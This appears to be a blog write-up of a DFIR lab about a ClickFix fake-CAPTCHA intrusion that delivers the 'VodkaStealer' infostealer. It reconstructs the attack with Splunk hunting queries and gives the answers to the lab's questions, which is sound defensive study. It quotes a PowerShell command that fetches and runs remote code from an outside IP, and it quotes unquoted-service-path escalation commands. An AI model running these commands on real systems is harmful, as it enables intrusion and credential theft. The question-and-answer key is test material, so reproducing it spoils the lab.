Skip to main content

ClickFix VodkaStealer

·1487 words·7 mins
Ahmad Massad
Author
Ahmad Massad
A curious mind exploring the world of cybersecurity through threat hunting, malware analysis, and digital forensics. Sharing my investigations, discoveries, and lessons learned along the way.

Scenario
#

NextGen Financial Solutions’ SOC flagged anomalous PowerShell activity on an employee workstation during routine monitoring. Triage traced it back to a legitimate external site that had been compromised with a ClickFix overlay a fake CAPTCHA prompt that silently copies a malicious command to the victim’s clipboard and instructs them to paste it into the Windows Run dialog.

By the time IR got involved, the attacker had already escalated privileges, moved laterally across the network, and dropped a custom infostealer (“VodkaStealer”) on multiple endpoints. Browser credentials, crypto wallet files, and internal documents all appear to have been collected, staged, and exfiltrated to an external server.

Working from Splunk log data across all affected hosts plus disk images, the goal is to rebuild the full attack chain, identify which systems and accounts were touched, and scope the breach.


Initial Triage
#

First how many hosts are in scope, and how much activity does each one have?

| metadata type=hosts index=*
| table host, firstTime, lastTime, totalCount
| convert ctime(firstTime) ctime(lastTime)

That gives us the four hosts in scope:

BCHAIN-WS-11
COMP-FS-01
DC01
PAYOPS-WS-04

Since the SOC alert was about suspicious PowerShell from an employee workstation, the next step is finding where this actually started:

index=* (EventCode=4688 OR EventCode=1) (Image="*powershell.exe" OR Image="*pwsh.exe" OR NewProcessName="*powershell.exe")
| eval cmdline=coalesce(CommandLine, ProcessCommandLine)
| where match(cmdline, "(?i)(-enc|-encodedcommand|-e |-ec |bypass|-nop|-noprofile|-w hidden|-windowstyle hidden|downloadstring|downloadfile|invoke-expression|iex|frombase64string|net\.webclient|-noninteractive|hidden|reflectivepeinjection|invoke-mimikatz|invoke-shellcode)")
| table _time, host, User, cmdline, ParentImage
| sort -_time

This is a broad sweep for suspicious PowerShell command-line indicators with key fields pulled out per event.

A hit immediately stands out on PAYOPS-WS-04, user n.hesham, at 2026-04-20 23:26:21:

  • Process: powershell.exe
  • Command line:
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://3.122.229.6/payload.ps1')"
  • Parent process: C:\Windows\explorer.exe

The parent process is anomalous explorer.exe does not spawn PowerShell under normal conditions. The command itself is straightforward: pull a script and execute it directly in memory, with no file ever touching disk.

Building a timeline around this event (a few minutes before and after) to see what led up to it:

Looking at the event flow, the user had Chrome open immediately before this. At 23:26:20, chrome.exe creates a named pipe confirming Chrome as the active browser at the time.

One second later at 23:26:21, the PowerShell command fires.

At the same timestamp (23:26:20), there is a registry write under RunMRU the ClickFix fingerprint, confirming the command was pasted into the Run dialog.

To identify the site that delivered the ClickFix lure, Chrome history was pulled directly from the disk image:

C:\Users\Administrator\Desktop\Start Here\Artifacts\Disk Images\PAYOPS-WS-04\uploads\auto\C%3A\Users\n.hesham\AppData\Local\Google\Chrome\User Data\Default\History

The same IP that served the ClickFix overlay also hosted payload.ps1 the attacker was running both the lure and the payload off the same server.


Initial Access
#

Q1 The user visited a legitimate website that had been compromised with a ClickFix CAPTCHA overlay. What is the IP address of this website?

Identified during triage.

Answer: 3.122.229.6


Execution
#

Q1 After interacting with the fake CAPTCHA, a PowerShell command was copied to the user’s clipboard and executed via the Run dialog. What is the name of the payload file this command downloads?

Visible in the command line pulled during triage.

Answer: payload.ps1


Command and Control Initial Beacon
#

Q1 The initial payload established a command-and-control channel. What is the IP address of the C2 server?

Sysmon Event ID 3 for the PowerShell process shows a network connection approximately 8 seconds after execution likely a sleep timer baked into the script.

index=* host="PAYOPS-WS-04" User="NEXTGEN\n.hesham" source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" EventID=3

Answer: 100.52.249.75 (port 443)


Discovery
#

Q1 To find a privilege escalation vector, the attacker enumerated all Windows services and their properties. What is the WMI command used to retrieve service names, executable paths, and start modes?

Six minutes after the C2 connection (23:33:18), PowerShell spawns cmd.exe and runs a WMI service dump filtered to anything matching “DataSync” indicating the attacker was already hunting a specific target service.

C:\Windows\system32\cmd.exe /C wmic service get name,pathname,startmode | findstr /i "DataSync"

Answer: wmic service get name,pathname,startmode


Privilege Escalation
#

Q1 The attacker exploited an unquoted service path vulnerability. What is the name of the service they exploited?

Pivoting on “DataSync” with Event ID 11 (file creation), three minutes after the enumeration (23:36:15), PowerShell drops a binary directly into the vulnerable service’s directory:

C:\Program Files\DataSync Pro\Service.exe

index=* host="PAYOPS-WS-04" User="NEXTGEN\n.hesham" "DataSync" EventID=11

Event ID 29 confirms Sysmon flagged it as a new PE.

38 seconds later, the service is stopped:

C:\Windows\system32\cmd.exe /C sc stop DataSyncPro

4 minutes later at 23:40:18, the dropped binary is renamed:

C:\Windows\system32\cmd.exe /C move "C:\Program Files\DataSync Pro\Service.exe" "C:\Program Files\DataSync Pro\Sync.exe"

At 23:41:23, the machine is rebooted which triggers the unquoted service path and executes Sync.exe as SYSTEM:

C:\Windows\system32\cmd.exe /C shutdown /r /t 5 /f

Answer: DataSyncPro

Q2 To hijack the service execution flow, the attacker placed a malicious binary in a specific directory. What is the name of this malicious executable?

Answer: Sync.exe


Command and Control SYSTEM Beacon
#

Q1 After successfully escalating privileges, a new process began beaconing to the C2 server as SYSTEM. What is the name of this process?

After the reboot, Sync.exe runs as SYSTEM. At 00:14:25 on the 21st, it spawns rundll32.exe with no arguments unusual, since rundll32.exe requires a DLL and export to function normally. With nothing to load, it serves as a hollow host process, most likely for injected shellcode. This is consistent with the broader shellcode injection pattern seen in this chain.

Network activity for that rundll32.exe instance (PID 3904) confirms it is beaconing:

index=* host="PAYOPS-WS-04" EventID=3 user=SYSTEM source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" process_id=3904

Answer: rundll32.exe


Credential Access
#

Q1 At what time did the attacker first obtain full access to LSASS for credential dumping?

Searching for handle requests to lsass.exe with 0x1FFFFF (PROCESS_ALL_ACCESS):

index=* host="PAYOPS-WS-04" EventID=10 user=SYSTEM source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" TargetImage="C:\Windows\system32\lsass.exe" "0x1fffff"

Answer: 2026-04-21 00:16:52

Tracking rundll32.exe post-credential access using it as the parent process:

index=* host="PAYOPS-WS-04" EventID=1 user=SYSTEM source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" ParentImage="C:\Windows\System32\rundll32.exe"

Post-dump timeline:

TimeAction
00:18:41Additional remote-shell payload dropped
00:23:56Domain machine enumeration
00:26:45Domain controller identification
00:27:00Full domain computer object listing
00:27:37Named pipe write 8bebcc2a1c9 (staging marker)
00:52:50cptchbuild.bin renamed to svc_update.exe
00:53:06Scheduled task created: NextGen\DataSync Update
00:53:24Scheduled task executed immediately
01:20:05vodkastealer_emulator.ps1 renamed to svc_update.ps1
01:20:32Scheduled task updated to point at renamed script
01:37:33svc_update.ps1 executed with explicit exfil parameters
01:38:00Single ICMP ping to BCHAIN-WS-11 lateral movement preparation

Q2 After harvesting credentials, the attacker used a stolen account for pass-the-hash lateral movement. What was the username of that account?

Since the attacker was heading toward BCHAIN-WS-11 immediately after dumping LSASS, checking that host for NTLM logons originating from PAYOPS-WS-04:

index=* host=BCHAIN-WS-11 EventID=4624 src_ip="10.10.11.252" Logon_Type=3 AuthenticationPackageName=NTLM

Answer: visible in the Account_Name field of the result above.


Lateral Movement
#

Q1 The attacker used the compromised domain admin’s credentials to move laterally to a file server. What is the IP address of this server?

Network connections from rundll32.exe on PAYOPS-WS-04 reveal a connection to the file server:

index=* host=PAYOPS-WS-04 Image="C:\Windows\System32\rundll32.exe" EventID=3

Answer: 10.10.11.81

Q2 A common lateral movement technique involves creating a temporary service on the target machine. What is the name of the service binary created on the file server?

At 00:30:45, the attacker creates a service over the ADMIN$ share on the file server image path \\10.10.11.81\ADMIN$\2fdb156.exe:

index=* host=COMP-FS-01 EventCode=7045

Answer: 2fdb156.exe


Persistence
#

Q1 To maintain access, the attacker created a scheduled task on all compromised machines. What is the full path of this scheduled task?

Answer: \NextGen\DataSync Update

Q2 The scheduled task was configured to execute a script. What is the filename of this script?

Answer: svc_update.ps1


Collection
#

Q1 The malicious script forcefully terminates browser processes to unlock their data files. What are the two browser processes it targets?

index=* host=PAYOPS-WS-04 Image="C:\Windows\System32\taskkill.exe" ParentCommandLine="powershell -nop -ep bypass -File C:\ProgramData\svc_update.ps1 -SkipChecks -ExfilPort 4444 -Verbose"

Answer: opera.exe, msedge.exe

Q2 The attacker creates a staging directory to store collected data before exfiltration. What is the full name of the staging directory created during the first execution?

Script Block Logging (Event ID 4104) was used to recover the script content:

index=* host=PAYOPS-WS-04 EventCode=4104 source="WinEventLog:Microsoft-Windows-PowerShell/Operational" "svc_update.ps1"

The script constructs the directory name as %TEMP%\sysinfo_<CountryCode>_<PublicIP>_<datetime>. To recover the exact value from the first execution, the $J USN journal was parsed with MFTECmd:

MFTECmd.exe -f "C:\Users\Administrator\Desktop\Start Here\Artifacts\Disk Images\PAYOPS-WS-04\uploads\ntfs\%5C%5C.%5CC%3A\$Extend\$UsnJrnl%3A$J" --csv sysinfo.csv

Answer: sysinfo_US_10.0.0.1_210420260133


Exfiltration
#

Q1 The attacker exfiltrated the stolen data to an external server. What is the IP address of the exfiltration server?

Visible in the svc_update.ps1 execution parameters.

Answer: 165.245.213.184

Q2 The attacker exfiltrated data from a second workstation using a different port. What was the destination port for this exfiltration?

index=* host=BCHAIN-WS-11 EventCode=1 parent_process_exec="powershell.exe"

Answer: 4444


Defense Evasion
#

Q1 After moving laterally, the attacker attempted to clean up their tools on the file server. At what time was the lateral movement service binary deleted?

index=* host=COMP-FS-01 EventCode=23 "2fdb156"

Answer: 00:30:47


Impact
#

Q1 By recovering the v2 svc_update.ps1 stealer code, how many execution phases are defined in the script?

Recovered via the same Script Block Logging query as above.

index=* host=PAYOPS-WS-04 EventCode=4104 source="WinEventLog:Microsoft-Windows-PowerShell/Operational" "svc_update.ps1"

Answer: 6